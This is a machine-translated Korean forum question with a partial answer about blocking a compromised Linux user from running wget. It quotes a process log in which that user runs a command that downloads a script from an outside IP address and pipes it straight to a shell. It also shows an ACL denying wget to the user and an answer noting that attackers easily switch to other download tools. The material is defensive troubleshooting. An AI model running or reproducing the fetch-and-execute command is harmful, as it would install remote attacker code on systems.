이 문제를 어떻게 해결할까요? 나는 다음을 시도했다Linux에서 특정 사용자에 대해 특정 명령을 비활성화하는 방법"긱 다이어리"에서 발췌
User:clipdrop PID:8426 PPID:8401 Run Time:0(secs) Memory:113280(kb) RSS:1180(kb) exe:/usr/bin/bash cmd:/bin/sh -c wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
편집 #1
실행하면 getfacl /usr/bin/wget다음과 같은 결과를 얻습니다.
getfacl: Removing leading '/' from absolute path names
# file: usr/bin/wget
# owner: root
# group: root
user::rwx
user:clipdrop:---
group::r-x
mask::r-x
other::r-x
답변1
Unix/Linux에서는 curlControl에서 악의적인 작업(무작위 파일 다운로드, FTP 클라이언트 사용, 웹 브라우저 사용, Emacs의 웹 브라우저 사용, 소스 코드 가져오기)을 수행하기 위한 대체 도구를 얻는 것이 너무 쉽습니다. 버전 시스템 및 컴파일 자체는 대부분의 "일반적인" 네트워킹 작업이 내장되어 있거나 다소 표준 라이브러리의 일부로 사용됩니다.